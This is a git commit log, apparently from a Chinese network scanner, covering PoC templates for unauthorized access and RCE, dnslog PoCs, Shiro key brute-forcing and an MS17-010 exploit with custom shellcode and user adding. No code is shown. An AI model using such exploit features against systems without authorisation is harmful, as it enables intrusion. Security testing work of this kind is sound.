影舞者	38e48ba420	Merge pull request #225 from evilAdan0s/main 去除弱特征：过时UA头	2022-09-02 11:38:41 +08:00
影舞者	076e001217	Update tongda-meeting-unauthorized-access.yml	2022-09-02 11:37:51 +08:00
影舞者	f981cf22e8	Update Hotel-Internet-Manage-RCE.yml	2022-09-02 11:37:36 +08:00
evilAdan0s	2e46d1adb6	'替换过时的UA头'	2022-09-02 11:26:06 +08:00
影舞者	4908720acb	socks代理时,自动-np	2022-08-16 15:10:09 +08:00
影舞者	98569648bb	增加-dns参数启用dnslog poc	2022-08-16 11:18:09 +08:00
影舞者	9b0f12c31a	update go.mod	2022-08-01 14:19:55 +08:00
影舞者	e705b33830	update	2022-07-15 15:21:52 +08:00
影舞者	3f8fd82674	默认跳过dnslog的poc	2022-07-14 16:03:11 +08:00
影舞者	3ba0a2abd3	-hf 支持host:port和host/xx:port格式	2022-07-14 12:19:16 +08:00
影舞者	6f9e49a572	-hf 支持host:port和host/xx:port格式	2022-07-14 12:04:47 +08:00
影舞者	c717094158	update	2022-07-14 11:14:20 +08:00
影舞者	023fa19a48	rule.Search 正则匹配范围从body改成header+body	2022-07-11 16:50:32 +08:00
影舞者	ed96a8dd89	-nobr不再包含-nopoc.优化webtitle 输出格式	2022-07-11 14:38:47 +08:00
影舞者	45008bcbfc	update	2022-07-07 15:06:54 +08:00
影舞者	740ce8552a	update	2022-07-07 15:04:59 +08:00
影舞者	cd423c88d1	update reademe.md	2022-07-06 21:50:48 +08:00
影舞者	fe937ec056	update reademe.md	2022-07-06 21:48:49 +08:00
影舞者	30df6b651f	加入手工gc回收,尝试节省无用内存。 -url 支持逗号隔开。修复一个poc模块bug。	2022-07-06 21:42:00 +08:00
影舞者	6e5642c508	update README.md	2022-07-05 12:59:23 +08:00
影舞者	2a6491808d	update README.md	2022-07-05 12:50:28 +08:00
影舞者	0146a941cf	update README.md	2022-07-05 12:49:04 +08:00
影舞者	67f30bf4e3	Merge pull request #197 from u21h2/main 使用毫秒作为随机数种子，避免生成的ceye子域名相同，导致反连平台误报	2022-07-03 23:53:47 +08:00
影舞者	f2239b6c9f	减少pocinfo结构体大小	2022-07-03 23:48:06 +08:00
影舞者	b9b5eb9ce4	减少info结构体大小	2022-07-03 23:41:39 +08:00
U21H2	4b596180a3	Update check.go 使用毫秒作为随机数种子，避免生成的ceye子域名相同	2022-07-03 23:07:25 +08:00
影舞者	8e1db5995e	加强poc fuzz模块,支持跑备份文件、目录、shiro-key(默认跑10key,可用-full参数跑100key)等。新增ms17017利用(使用参数: -sc add),可在ms17010-exp.go自定义shellcode,内置添加用户等功能。新增poc、指纹。支持socks5代理。因body指纹更全,默认不再跑ico图标。	2022-07-02 17:25:15 +08:00